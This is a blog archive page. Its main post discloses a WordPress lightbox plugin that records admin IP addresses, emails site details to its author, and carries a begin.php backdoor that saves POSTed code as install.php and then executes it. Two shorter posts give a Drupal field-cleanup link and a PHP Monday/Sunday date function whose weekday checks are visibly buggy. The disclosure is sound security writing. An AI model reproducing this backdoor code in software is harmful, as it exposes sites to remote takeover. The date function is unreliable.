Category Archives: Uncategorized

The sad state of WordPress plugins

Migrating your WordPress website to a new host is usually a breeze. Same goes for installing plugins and themes. But what is running behind the scenes when using these community provided plugins and themes?

Handy Lightbox

Let us start with the first example, a plugin I had installed on this blog named “Handy Lightbox”. Behaviour is simple and straightforward, enable Lightbox jQuery plugin for images on your website. Everything works fine, until you take a look at the code. Let us look at the first issue that popped up because I do not allow my webserver user to write to any directory.

$requrl = $_SERVER["REQUEST_URI"];
$ip = $_SERVER['REMOTE_ADDR'];
if (eregi("admin", $requrl)) {
$inside = "yes";
} else {
$inside = "no";
}
if ($inside == 'yes') {
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring = $contents;
$findme  = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}
}

Code quality aside, it writes every admin’s IP into a file called welcome.txt. Why?

Next up, e-mailing the developer to confirm plugin activation and reporting site url. The e-mail address has been changed by me.

/** Activate The Plugin */

function actithelightbox_activate() { 
$yourip = $_SERVER['REMOTE_ADDR'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $yourip);
fclose($fp);
add_option('redirectlightbox_do_activation_redirect', true);
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Activated"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
wp_redirect('../wp-admin/options-general.php?page=jquery-lightbox-options');
}

The same is done when uninstalling the plugin.

/** Uninstall The Plugin */
function deactthelightbox_deactivate() { 
session_start(); $subj = get_option('siteurl'); $msg = "Plugin Uninstalled"; $from = get_option('admin_email'); mail("authoremail@gmail.com", $subj, $msg, $from);
}

And I am not sure how this can be considered “outputting SEO”.

function outputseo() {
if (is_user_logged_in()) {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme  = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
$contents = $contents . $ip;
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/welcome.txt', 'w');
fwrite($fp, $contents);
fclose($fp);
}

}

$filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

if (file_exists($filename)) {

    include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php');

} 
}

But wait, there is more! Have a look at begin.php in his plugin. Which I actually only uncovered while writing this blog post.

session_start();
$installtheplugin = $_POST['installit'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/wp-handy-lightbox/install.php', 'w');
$installtheplugin = str_replace('\\', '', $installtheplugin);
$installtheplugin = htmlentities($installtheplugin);
fwrite($fp, html_entity_decode($installtheplugin));
fclose($fp);
echo $installtheplugin;

Allowing someone externally to upload a file, save it under “install.php” and execute it. Since the plugin author has the URL to every installation made, they can easily abuse this script. Or anyone else that knows about the issues this plugin has.

I have contacted the developer, but I do not expect much of a reply.

Drupal 7, delete ghost fields from the database

Delete ghost or dead fields in your Drupal 7 website. Sometimes you will end up with dead fields in your database after altering a feature that contained content types. This gist will get all the linked fields from your entities, all the fields defined in the database, find out the difference between them, and remove them.

https://gist.github.com/ThomasHambach/7114893

PHP Get monday, sunday, last monday & last sunday

A function I’ve put togheter for a work-related project to get date of monday, sunday, last monday & last sunday.. Might add in next monday and sunday later.


/**
* Get Mondays and Sundays
*
* Get monday, sunday, last monday & last sunday
* Example usage:
* // to retreive the dates using today as starting point
* $mondaysAndSundays = getMondaysAndSundays();
* // to retreive the dates using a custom date as starting point
* $mondaysAndSundays = getMondaysAndSundays('1987-04-14');
*
* @param date $offset Provide a date from where to calculate from in strtotime() translatable format. If none is given, today's date will be used.
*
* @return array
*
*/
function getMondaysAndSundays($offset=false)
{

if(!$offset) $offset = strtotime(date('Y-m-d'));
else $offset = strtotime($offset);

// this week
if(date('w',$offset) == 1)
{
$mas['monday'] = date('Y-m-d',$offset);
}
else
{
$mas['monday'] = date('Y-m-d',strtotime("last Monday",$offset));
}

if(date('w',$offset) == 6)
{
$mas['sunday'] = date('Y-m-d',$offset);
}
else
{
$mas['sunday'] = date('Y-m-d',strtotime("next Sunday",$offset));
}

// last week
if(date('w',$offset) == 1)
{
$mas['lastmonday'] =  date('Y-m-d',strtotime('-1 week',$offset));
}
else
{
$mas['lastmonday'] = date('Y-m-d',strtotime('-1 week', strtotime(date('Y-m-d',strtotime("last Monday",$offset)))));
}

if(date('w') == 6)
{
$mas['lastsunday'] = date('Y-m-d',strtotime('-1 week',$offset));
}
else
{
$mas['lastsunday'] = date('Y-m-d',strtotime("last Sunday",$offset));
}

return $mas;
}